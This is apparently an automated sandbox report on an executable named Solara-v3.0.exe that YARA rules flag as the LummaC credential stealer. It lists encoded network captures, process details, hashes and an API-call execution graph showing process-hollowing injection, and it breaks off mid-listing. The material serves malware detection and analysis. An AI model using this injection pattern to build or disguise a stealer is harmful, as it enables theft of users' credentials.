                                                                                                                                                                                                                                            2024-12-28 01:55:21 UTC1369INData Raw: 6d 30 6d 7a 57 41 68 4d 50 67 4c 6a 59 52 56 71 75 4f 75 58 48 47 50 32 66 2b 66 6b 4b 41 45 71 79 36 6d 52 58 35 78 38 30 39 4b 65 70 47 74 51 33 48 53 50 45 68 2b 70 46 54 4b 42 64 35 70 34 35 38 71 71 72 77 53 73 4d 52 37 50 56 50 6b 6e 56 48 47 62 37 6c 71 34 63 34 52 4d 2b 41 49 53 73 35 33 6c 34 6a 47 6e 6d 35 43 6a 4a 72 71 6a 4d 42 43 38 62 2b 35 41 62 64 64 63 58 52 66 61 6b 75 57 6e 43 46 67 67 4f 35 61 72 69 57 54 79 6e 56 6f 65 59 5a 2b 6d 7a 69 74 30 46 41 77 61 6a 38 44 68 65 38 52 4a 6d 2f 38 57 47 5a 4e 59 43 45 77 2b 41 75 4e 68 46 57 71 34 35 68 66 77 30 6d 4a 54 35 30 41 67 57 52 4b 44 78 47 6d 33 4c 4b 45 47 50 7a 36 42 62 30 7a 77 6d 4b 49 57 74 77 55 42 73 75 6d 57 68 31 41 66 69 71 6f 44 56 64 44 74 70 76 50 46 37 65 39 30 77 65 39
                                                                                                                                                                                                                                            Data Ascii: m0mzWAhMPgLjYRVquOuXHGP2f+fkKAEqy6mRX5x809KepGtQ3HSPEh+pFTKBd5p458qqrwSsMR7PVPknVHGb7lq4c4RM+AISs53l4jGnm5CjJrqjMBC8b+5AbddcXRfakuWnCFggO5ariWTynVoeYZ+mzit0FAwaj8Dhe8RJm/8WGZNYCEw+AuNhFWq45hfw0mJT50AgWRKDxGm3LKEGPz6Bb0zwmKIWtwUBsumWh1AfiqoDVdDtpvPF7e90we9
                                                                                                                                                                                                                                            2024-12-28 01:55:21 UTC1369INData Raw: 6b 54 63 65 47 6f 65 79 36 6b 64 69 33 7a 71 2b 34 69 6a 39 6d 76 54 70 4f 7a 46 6d 71 74 63 43 56 65 35 6a 56 75 54 50 71 42 7a 4c 48 43 38 52 6d 62 76 55 63 46 2f 5a 50 70 7a 5a 42 4d 61 42 6c 74 6f 36 55 45 47 71 30 51 6f 76 68 77 39 49 30 71 44 54 61 4f 73 2b 4a 51 6a 56 69 36 4d 43 56 5a 68 68 68 2f 51 4e 2f 75 4b 55 37 69 45 71 58 62 2f 56 4a 48 44 71 63 56 62 49 6b 59 74 33 30 67 45 58 4c 38 36 30 33 57 74 76 33 30 53 6a 6d 79 33 34 34 70 48 67 49 41 52 70 6c 76 6f 31 4b 50 42 6f 58 75 2f 48 6a 30 66 65 52 7a 30 58 34 6f 58 2f 52 44 53 41 50 2b 62 47 46 4e 79 35 74 6f 77 4a 46 48 36 54 32 69 6c 66 2b 41 49 31 32 4b 48 53 64 38 73 61 42 69 62 71 38 4d 52 31 61 34 63 37 6c 65 41 74 35 4c 65 56 2f 79 77 36 48 37 72 34 49 55 2f 34 59 6d 33 36 6b 49 73
                                                                                                                                                                                                                                            Data Ascii: kTceGoey6kdi3zq+4ij9mvTpOzFmqtcCVe5jVuTPqBzLHC8RmbvUcF/ZPpzZBMaBlto6UEGq0Qovhw9I0qDTaOs+JQjVi6MCVZhhh/QN/uKU7iEqXb/VJHDqcVbIkYt30gEXL8603Wtv30Sjmy344pHgIARplvo1KPBoXu/Hj0feRz0X4oX/RDSAP+bGFNy5towJFH6T2ilf+AI12KHSd8saBibq8MR1a4c7leAt5LeV/yw6H7r4IU/4Ym36kIs


                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:20:54:54
                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Solara-v3.0.exe"
                                                                                                                                                                                                                                            Imagebase:0xc90000
                                                                                                                                                                                                                                            File size:567'848 bytes
                                                                                                                                                                                                                                            MD5 hash:AC461B5D5AC030C7CC5C2F48EFC44668
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                            Start time:20:54:54
                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                            Start time:20:54:55
                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Solara-v3.0.exe"
                                                                                                                                                                                                                                            Imagebase:0xc90000
                                                                                                                                                                                                                                            File size:567'848 bytes
                                                                                                                                                                                                                                            MD5 hash:AC461B5D5AC030C7CC5C2F48EFC44668
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                            Start time:20:54:55
                                                                                                                                                                                                                                            Start date:27/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Solara-v3.0.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Solara-v3.0.exe"
                                                                                                                                                                                                                                            Imagebase:0xc90000
                                                                                                                                                                                                                                            File size:567'848 bytes
                                                                                                                                                                                                                                            MD5 hash:AC461B5D5AC030C7CC5C2F48EFC44668
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2215880335.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2193726868.000000000336E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2193850105.000000000331F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2193758527.000000000331F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2215763251.0000000003332000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2193931805.0000000003331000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:6.5%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:1.1%
                                                                                                                                                                                                                                              Signature Coverage:3.7%
                                                                                                                                                                                                                                              Total number of Nodes:849
                                                                                                                                                                                                                                              Total number of Limit Nodes:22
                                                                                                                                                                                                                                              execution_graph 20095 cca19e 20096 cca1d4 20095->20096 20097 cca321 GetPEB 20096->20097 20098 cca333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 20096->20098 20101 cca3ca TerminateProcess 20096->20101 20097->20098 20098->20096 20099 cca3da WriteProcessMemory 20098->20099 20100 cca41f 20099->20100 20102 cca424 WriteProcessMemory 20100->20102 20103 cca461 WriteProcessMemory Wow64SetThreadContext ResumeThread 20100->20103 20101->20096 20102->20100 20104 ca044d 20113 c9f896 GetModuleHandleW 20104->20113 20106 ca0455 20107 ca048b 20106->20107 20108 ca0459 20106->20108 20115 ca555b 21 API calls CallUnexpected 20107->20115 20110 ca0464 20108->20110 20114 ca5580 21 API calls CallUnexpected 20108->20114 20111 ca0493 20113->20106 20114->20110 20115->20111 20116 ca0312 20117 ca031e ___scrt_is_nonwritable_in_current_image 20116->20117 20142 c9a8ca 20117->20142 20119 ca0325 20120 ca047e 20119->20120 20130 ca034f ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 20119->20130 20184 c9f8e9 4 API calls 2 library calls 20120->20184 20122 ca0485 20177 ca5545 20122->20177 20126 ca0493 20127 ca036e 20128 ca03ef 20153 ca7abc 20128->20153 20130->20127 20130->20128 20180 ca558f 39 API calls 4 library calls 20130->20180 20132 ca03f5 20157 c924b0 GetConsoleWindow ShowWindow 20132->20157 20136 ca0416 20136->20122 20137 ca041a 20136->20137 20138 ca0423 20137->20138 20182 ca5571 21 API calls CallUnexpected 20137->20182 20183 c9a903 75 API calls ___scrt_uninitialize_crt 20138->20183 20141 ca042c 20141->20127 20143 c9a8d3 20142->20143 20186 c9f555 IsProcessorFeaturePresent 20143->20186 20145 c9a8df 20187 ca0cc8 10 API calls 2 library calls 20145->20187 20147 c9a8e4 20148 c9a8e8 20147->20148 20188 ca3230 20147->20188 20148->20119 20151 c9a8ff 20151->20119 20154 ca7aca 20153->20154 20155 ca7ac5 20153->20155 20154->20132 20201 ca7be5 59 API calls 20155->20201 20202 c9a663 20157->20202 20161 c92513 20162 c9251d 20161->20162 20163 c92554 20161->20163 20164 c9256c 20162->20164 20165 c92524 GetCurrentThreadId 20162->20165 20229 c9b317 30 API calls 2 library calls 20163->20229 20230 c9b317 30 API calls 2 library calls 20164->20230 20167 c9252d 20165->20167 20168 c9257d 20165->20168 20228 c9f11d WaitForSingleObjectEx GetExitCodeThread CloseHandle 20167->20228 20231 c9b317 30 API calls 2 library calls 20168->20231 20172 c9253a 20173 c9258e 20172->20173 20174 c92541 20172->20174 20232 c9b317 30 API calls 2 library calls 20173->20232 20181 c9f896 GetModuleHandleW 20174->20181 20382 ca5690 20177->20382 20180->20128 20181->20136 20182->20138 20183->20141 20184->20122 20185 ca555b 21 API calls CallUnexpected 20185->20126 20186->20145 20187->20147 20192 cae2e9 20188->20192 20191 ca0ce7 7 API calls 2 library calls 20191->20148 20193 cae2f9 20192->20193 20194 c9a8f1 20192->20194 20193->20194 20196 cada52 20193->20196 20194->20151 20194->20191 20197 cada59 20196->20197 20198 cada9c GetStdHandle 20197->20198 20199 cadafe 20197->20199 20200 cadaaf GetFileType 20197->20200 20198->20197 20199->20193 20200->20197 20201->20154 20203 c9a668 _Yarn 20202->20203 20204 c924f3 20203->20204 20206 c9a684 20203->20206 20233 ca5877 EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20203->20233 20213 ca5349 20204->20213 20207 c9f338 std::ios_base::_Init 20206->20207 20208 c9a68e Concurrency::cancel_current_task 20206->20208 20235 ca060c RaiseException 20207->20235 20234 ca060c RaiseException 20208->20234 20211 c9f354 20212 c9b4ce 20214 ca536a 20213->20214 20215 ca5356 20213->20215 20236 ca53da 20214->20236 20245 ca76e4 14 API calls __dosmaperr 20215->20245 20219 ca535b 20246 ca7dcf 29 API calls __strnicoll 20219->20246 20220 ca537f CreateThread 20222 ca53aa 20220->20222 20223 ca539e GetLastError 20220->20223 20272 ca5470 20220->20272 20248 ca542a 20222->20248 20247 ca770a 14 API calls 2 library calls 20223->20247 20224 ca5366 20224->20161 20228->20172 20233->20203 20234->20212 20235->20211 20256 cad2b4 20236->20256 20241 ca53ff GetModuleHandleExW 20242 ca541c 20241->20242 20243 ca542a 16 API calls 20242->20243 20244 ca5376 20243->20244 20244->20220 20244->20222 20245->20219 20246->20224 20247->20222 20249 ca53b5 20248->20249 20250 ca5436 20248->20250 20249->20161 20251 ca543c CloseHandle 20250->20251 20252 ca5445 20250->20252 20251->20252 20253 ca544b FreeLibrary 20252->20253 20254 ca5454 20252->20254 20253->20254 20255 cabed7 ___free_lconv_mon 14 API calls 20254->20255 20255->20249 20261 cad2c1 __Getctype 20256->20261 20257 cad301 20270 ca76e4 14 API calls __dosmaperr 20257->20270 20258 cad2ec RtlAllocateHeap 20259 ca53eb 20258->20259 20258->20261 20263 cabed7 20259->20263 20261->20257 20261->20258 20269 ca5877 EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20261->20269 20264 ca53f8 20263->20264 20265 cabee2 RtlFreeHeap 20263->20265 20264->20241 20264->20242 20265->20264 20266 cabef7 GetLastError 20265->20266 20267 cabf04 __dosmaperr 20266->20267 20271 ca76e4 14 API calls __dosmaperr 20267->20271 20269->20261 20270->20259 20271->20264 20273 ca547c ___scrt_is_nonwritable_in_current_image 20272->20273 20274 ca5483 GetLastError ExitThread 20273->20274 20275 ca5490 20273->20275 20286 cac16a GetLastError 20275->20286 20281 ca54ac 20317 ca53cc 20281->20317 20287 cac186 20286->20287 20288 cac180 20286->20288 20310 cac18a SetLastError 20287->20310 20321 cacbd3 20287->20321 20326 cacb94 6 API calls std::_Lockit::_Lockit 20288->20326 20293 cad2b4 __Getctype 14 API calls 20296 cac1b7 20293->20296 20294 ca5495 20313 caf767 20294->20313 20295 cac21f 20328 ca8353 39 API calls CallUnexpected 20295->20328 20298 cac1bf 20296->20298 20299 cac1d0 20296->20299 20302 cacbd3 __Getctype 6 API calls 20298->20302 20300 cacbd3 __Getctype 6 API calls 20299->20300 20304 cac1dc 20300->20304 20303 cac1cd 20302->20303 20308 cabed7 ___free_lconv_mon 14 API calls 20303->20308 20305 cac1e0 20304->20305 20306 cac1f7 20304->20306 20307 cacbd3 __Getctype 6 API calls 20305->20307 20327 cac47c 14 API calls __Getctype 20306->20327 20307->20303 20308->20310 20310->20294 20310->20295 20311 cac202 20312 cabed7 ___free_lconv_mon 14 API calls 20311->20312 20312->20310 20314 ca54a0 20313->20314 20315 caf777 CallUnexpected 20313->20315 20314->20281 20320 cacde0 5 API calls std::_Lockit::_Lockit 20314->20320 20315->20314 20344 cace89 20315->20344 20347 ca54ee 20317->20347 20319 ca53d9 20320->20281 20329 cacfd6 20321->20329 20324 cac1a2 20324->20293 20324->20310 20325 cacc0d TlsSetValue 20326->20287 20327->20311 20330 cacbef 20329->20330 20331 cad006 20329->20331 20330->20324 20330->20325 20331->20330 20336 cacf0b 20331->20336 20334 cad020 GetProcAddress 20334->20330 20335 cad030 std::_Lockit::_Lockit 20334->20335 20335->20330 20342 cacf1c ___vcrt_FlsFree 20336->20342 20337 cacf3a LoadLibraryExW 20339 cacfb9 20337->20339 20340 cacf55 GetLastError 20337->20340 20338 cacfb2 20338->20330 20338->20334 20339->20338 20341 cacfcb FreeLibrary 20339->20341 20340->20342 20341->20338 20342->20337 20342->20338 20343 cacf88 LoadLibraryExW 20342->20343 20343->20339 20343->20342 20345 cacfd6 std::_Lockit::_Lockit 5 API calls 20344->20345 20346 cacea5 20345->20346 20346->20314 20356 cac2bb GetLastError 20347->20356 20349 ca553b ExitThread 20350 ca54f9 20350->20349 20351 ca5512 20350->20351 20379 cace1b 5 API calls std::_Lockit::_Lockit 20350->20379 20353 ca5525 20351->20353 20354 ca551e CloseHandle 20351->20354 20353->20349 20355 ca5531 FreeLibraryAndExitThread 20353->20355 20354->20353 20355->20349 20357 cac2d7 20356->20357 20358 cac2d1 20356->20358 20359 cacbd3 __Getctype 6 API calls 20357->20359 20362 cac2db SetLastError 20357->20362 20380 cacb94 6 API calls std::_Lockit::_Lockit 20358->20380 20361 cac2f3 20359->20361 20361->20362 20364 cad2b4 __Getctype 12 API calls 20361->20364 20362->20350 20365 cac308 20364->20365 20366 cac310 20365->20366 20367 cac321 20365->20367 20368 cacbd3 __Getctype 6 API calls 20366->20368 20369 cacbd3 __Getctype 6 API calls 20367->20369 20370 cac31e 20368->20370 20371 cac32d 20369->20371 20374 cabed7 ___free_lconv_mon 12 API calls 20370->20374 20372 cac348 20371->20372 20373 cac331 20371->20373 20381 cac47c 14 API calls __Getctype 20372->20381 20376 cacbd3 __Getctype 6 API calls 20373->20376 20374->20362 20376->20370 20377 cac353 20378 cabed7 ___free_lconv_mon 12 API calls 20377->20378 20378->20362 20379->20351 20380->20357 20381->20377 20383 ca56cf 20382->20383 20384 ca56bd 20382->20384 20394 ca582a 20383->20394 20409 c9f896 GetModuleHandleW 20384->20409 20387 ca56c2 20387->20383 20410 ca55c4 GetModuleHandleExW 20387->20410 20389 ca048b 20389->20185 20393 ca5721 20395 ca5836 ___scrt_is_nonwritable_in_current_image 20394->20395 20416 ca80e1 EnterCriticalSection 20395->20416 20397 ca5840 20417 ca5727 20397->20417 20399 ca584d 20421 ca586b 20399->20421 20402 ca565f 20426 ca5646 20402->20426 20404 ca5669 20405 ca567d 20404->20405 20406 ca566d GetCurrentProcess TerminateProcess 20404->20406 20407 ca55c4 CallUnexpected 3 API calls 20405->20407 20406->20405 20408 ca5685 ExitProcess 20407->20408 20409->20387 20411 ca5603 GetProcAddress 20410->20411 20412 ca5624 20410->20412 20411->20412 20415 ca5617 20411->20415 20413 ca562a FreeLibrary 20412->20413 20414 ca5633 20412->20414 20413->20414 20414->20383 20415->20412 20416->20397 20419 ca5733 ___scrt_is_nonwritable_in_current_image CallUnexpected 20417->20419 20420 ca5797 CallUnexpected 20419->20420 20424 ca73fe 14 API calls 3 library calls 20419->20424 20420->20399 20425 ca80f8 LeaveCriticalSection 20421->20425 20423 ca5706 20423->20389 20423->20402 20424->20420 20425->20423 20429 caf740 5 API calls CallUnexpected 20426->20429 20428 ca564b CallUnexpected 20428->20404 20429->20428 20430 c915d0 20441 c91e40 20430->20441 20432 c91702 _Deallocate 20433 c915db 20435 c916dd 20433->20435 20447 c94320 20433->20447 20460 c91750 20433->20460 20474 c91d10 20433->20474 20435->20432 20482 ca7ddf 29 API calls 2 library calls 20435->20482 20442 c91e63 _Fputc 20441->20442 20483 ca3558 20442->20483 20444 c91e7c 20490 c9a6e1 20444->20490 20446 c91e8c 20446->20433 20448 c9444e 20447->20448 20449 c94364 20447->20449 20671 c92610 30 API calls 2 library calls 20448->20671 20451 c9437e 20449->20451 20452 c943a5 20449->20452 20458 c94393 _Yarn 20449->20458 20451->20448 20455 c9438a 20451->20455 20453 c9a663 std::ios_base::_Init 3 API calls 20452->20453 20453->20458 20457 c9a663 std::ios_base::_Init 3 API calls 20455->20457 20457->20458 20459 c94424 _Deallocate 20458->20459 20672 ca7ddf 29 API calls 2 library calls 20458->20672 20459->20433 20461 c91788 _strlen 20460->20461 20464 c91833 20461->20464 20465 c9180d 20461->20465 20699 c92c50 20461->20699 20464->20465 20673 c94460 20464->20673 20468 c91b8e 20465->20468 20710 c92f00 38 API calls std::ios_base::_Init 20465->20710 20711 c932c0 30 API calls 5 library calls 20465->20711 20712 ca060c RaiseException 20465->20712 20467 c91b9f 20467->20433 20468->20467 20709 c938e0 39 API calls 2 library calls 20468->20709 20472 c9188d 20472->20465 20690 c9def0 20472->20690 20475 c91d5c 20474->20475 20476 c94460 67 API calls 20475->20476 20477 c91d70 20476->20477 20875 c94b10 20477->20875 20480 c92c50 39 API calls 20481 c91deb 20480->20481 20481->20433 20484 ca356c _Fputc 20483->20484 20485 ca358e 20484->20485 20487 ca35b5 20484->20487 20505 ca7f78 29 API calls 2 library calls 20485->20505 20497 ca4d0d 20487->20497 20489 ca35a9 _Fputc 20489->20444 20491 c9a6e9 20490->20491 20492 c9a6ea IsProcessorFeaturePresent 20490->20492 20491->20446 20494 c9f447 20492->20494 20670 c9f52d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20494->20670 20496 c9f52a 20496->20446 20498 ca4d19 ___scrt_is_nonwritable_in_current_image 20497->20498 20506 ca3315 EnterCriticalSection 20498->20506 20500 ca4d27 20507 ca46e2 20500->20507 20504 ca4d45 20504->20489 20505->20489 20506->20500 20519 cae68b 20507->20519 20509 ca4709 20526 ca3b31 20509->20526 20516 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20517 ca477c 20516->20517 20518 ca4d5c LeaveCriticalSection _Ungetc 20517->20518 20518->20504 20549 cae736 20519->20549 20521 cae69c _Fputc 20522 cae6fe 20521->20522 20556 cabf11 20521->20556 20522->20509 20525 cabed7 ___free_lconv_mon 14 API calls 20525->20522 20586 ca3a93 20526->20586 20529 ca3b7f std::_Locinfo::_Locinfo_dtor 20532 ca3b74 20529->20532 20537 ca39f2 66 API calls 20529->20537 20538 ca3d73 20529->20538 20593 ca3790 39 API calls _Fputc 20529->20593 20594 ca3de1 29 API calls 20529->20594 20595 ca3e59 70 API calls 2 library calls 20529->20595 20596 ca3fb2 70 API calls 2 library calls 20529->20596 20530 ca3b57 20592 ca7f78 29 API calls 2 library calls 20530->20592 20542 ca3861 20532->20542 20537->20529 20597 ca7f78 29 API calls 2 library calls 20538->20597 20540 ca3d8d 20598 ca7f78 29 API calls 2 library calls 20540->20598 20543 cabed7 ___free_lconv_mon 14 API calls 20542->20543 20544 ca3871 20543->20544 20545 cae774 20544->20545 20546 cae77f 20545->20546 20547 ca476a 20545->20547 20546->20547 20601 ca85b8 20546->20601 20547->20516 20550 cae742 _Fputc 20549->20550 20551 cae76c 20550->20551 20563 caf704 20550->20563 20551->20521 20553 cae75d 20570 cb744f 20553->20570 20555 cae763 20555->20521 20557 cabf4f 20556->20557 20561 cabf1f __Getctype 20556->20561 20585 ca76e4 14 API calls __dosmaperr 20557->20585 20559 cabf3a RtlAllocateHeap 20560 cabf4d 20559->20560 20559->20561 20560->20525 20561->20557 20561->20559 20584 ca5877 EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 20561->20584 20564 caf710 20563->20564 20565 caf725 20563->20565 20579 ca76e4 14 API calls __dosmaperr 20564->20579 20565->20553 20567 caf715 20580 ca7dcf 29 API calls __strnicoll 20567->20580 20569 caf720 20569->20553 20571 cb7469 20570->20571 20572 cb745c 20570->20572 20574 cb7475 20571->20574 20582 ca76e4 14 API calls __dosmaperr 20571->20582 20581 ca76e4 14 API calls __dosmaperr 20572->20581 20574->20555 20576 cb7461 20576->20555 20577 cb7496 20583 ca7dcf 29 API calls __strnicoll 20577->20583 20579->20567 20580->20569 20581->20576 20582->20577 20583->20576 20584->20561 20585->20560 20587 ca3a9e 20586->20587 20588 ca3ac0 20586->20588 20599 ca7f78 29 API calls 2 library calls 20587->20599 20600 ca35fc 29 API calls 2 library calls 20588->20600 20591 ca3ab9 20591->20529 20591->20530 20591->20532 20592->20532 20593->20529 20594->20529 20595->20529 20596->20529 20597->20540 20598->20532 20599->20591 20600->20591 20602 ca85f8 20601->20602 20603 ca85d1 20601->20603 20602->20547 20603->20602 20604 caf704 _Fputc 29 API calls 20603->20604 20605 ca85ed 20604->20605 20607 cb3e10 20605->20607 20608 cb3e1c ___scrt_is_nonwritable_in_current_image 20607->20608 20609 cb3e5d 20608->20609 20611 cb3ea3 20608->20611 20617 cb3e24 20608->20617 20647 ca7f78 29 API calls 2 library calls 20609->20647 20618 cb3868 EnterCriticalSection 20611->20618 20613 cb3ea9 20614 cb3ec7 20613->20614 20619 cb3bf4 20613->20619 20648 cb3f19 LeaveCriticalSection __fread_nolock 20614->20648 20617->20602 20618->20613 20620 cb3c1c 20619->20620 20644 cb3c3f __fread_nolock 20619->20644 20621 cb3c20 20620->20621 20623 cb3c7b 20620->20623 20663 ca7f78 29 API calls 2 library calls 20621->20663 20624 cb3c99 20623->20624 20664 cb29a2 31 API calls __fread_nolock 20623->20664 20649 cb3f21 20624->20649 20628 cb3cf8 20630 cb3d0c 20628->20630 20631 cb3d61 WriteFile 20628->20631 20629 cb3cb1 20632 cb3cb9 20629->20632 20633 cb3ce0 20629->20633 20636 cb3d4d 20630->20636 20637 cb3d14 20630->20637 20634 cb3d83 GetLastError 20631->20634 20646 cb3cf3 20631->20646 20632->20644 20665 cb4365 6 API calls _Fputc 20632->20665 20666 cb3f9e 45 API calls 4 library calls 20633->20666 20634->20646 20656 cb43cd 20636->20656 20638 cb3d39 20637->20638 20639 cb3d19 20637->20639 20668 cb4591 8 API calls 2 library calls 20638->20668 20642 cb3d22 20639->20642 20639->20644 20667 cb44a8 7 API calls 2 library calls 20642->20667 20644->20614 20646->20644 20647->20617 20648->20617 20650 cb744f __fread_nolock 29 API calls 20649->20650 20652 cb3f33 20650->20652 20651 cb3cab 20651->20628 20651->20629 20652->20651 20653 cb3f61 20652->20653 20669 ca3790 39 API calls _Fputc 20652->20669 20653->20651 20655 cb3f7b GetConsoleMode 20653->20655 20655->20651 20661 cb43dc _Fputc 20656->20661 20657 cb448d 20658 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20657->20658 20659 cb44a6 20658->20659 20659->20644 20660 cb444c WriteFile 20660->20661 20662 cb448f GetLastError 20660->20662 20661->20657 20661->20660 20662->20657 20663->20644 20664->20624 20665->20644 20666->20646 20667->20644 20668->20646 20669->20653 20670->20496 20671->20458 20713 c9a9f4 20673->20713 20676 c9a9f4 std::_Lockit::_Lockit 7 API calls 20677 c944b7 20676->20677 20719 c9aa25 20677->20719 20678 c94556 20680 c9aa25 std::_Lockit::~_Lockit 2 API calls 20678->20680 20679 c944d8 20679->20678 20726 c945f0 67 API calls 3 library calls 20679->20726 20683 c94585 20680->20683 20683->20472 20684 c9453b 20685 c94598 20684->20685 20686 c94543 20684->20686 20728 c93e50 RaiseException CallUnexpected 20685->20728 20727 c9ab43 RaiseException _Yarn Concurrency::cancel_current_task 20686->20727 20694 c9df1e 20690->20694 20698 c9df17 20690->20698 20691 c9a6e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 20692 c9e01c 20691->20692 20692->20472 20695 c9dfd0 20694->20695 20696 c9df69 20694->20696 20694->20698 20695->20698 20736 ca932d 20695->20736 20696->20698 20733 c9dada 20696->20733 20698->20691 20700 c92c90 20699->20700 20705 c92d5a 20699->20705 20701 c92cb3 20700->20701 20702 c92c50 39 API calls 20700->20702 20703 c92cd7 20700->20703 20701->20705 20871 c938e0 39 API calls 2 library calls 20701->20871 20702->20703 20703->20701 20872 c92f00 38 API calls std::ios_base::_Init 20703->20872 20873 c932c0 30 API calls 5 library calls 20703->20873 20874 ca060c RaiseException 20703->20874 20705->20464 20709->20467 20710->20465 20711->20465 20712->20465 20714 c9aa0a 20713->20714 20715 c9aa03 20713->20715 20717 c9449a 20714->20717 20730 c9fac8 EnterCriticalSection 20714->20730 20729 ca810f 6 API calls std::_Lockit::_Lockit 20715->20729 20717->20676 20717->20679 20720 ca811d 20719->20720 20722 c9aa2f 20719->20722 20732 ca80f8 LeaveCriticalSection 20720->20732 20725 c9aa42 20722->20725 20731 c9fad6 LeaveCriticalSection 20722->20731 20723 ca8124 20723->20679 20725->20679 20726->20684 20727->20678 20729->20717 20730->20717 20731->20725 20732->20723 20740 ca8d91 20733->20740 20735 c9dae8 20735->20698 20737 ca9340 _Fputc 20736->20737 20834 ca950e 20737->20834 20739 ca9355 _Fputc 20739->20698 20741 ca8da4 _Fputc 20740->20741 20744 ca8f33 20741->20744 20743 ca8db3 _Fputc 20743->20735 20745 ca8f3f ___scrt_is_nonwritable_in_current_image 20744->20745 20746 ca8f6b 20745->20746 20747 ca8f46 20745->20747 20755 ca3315 EnterCriticalSection 20746->20755 20785 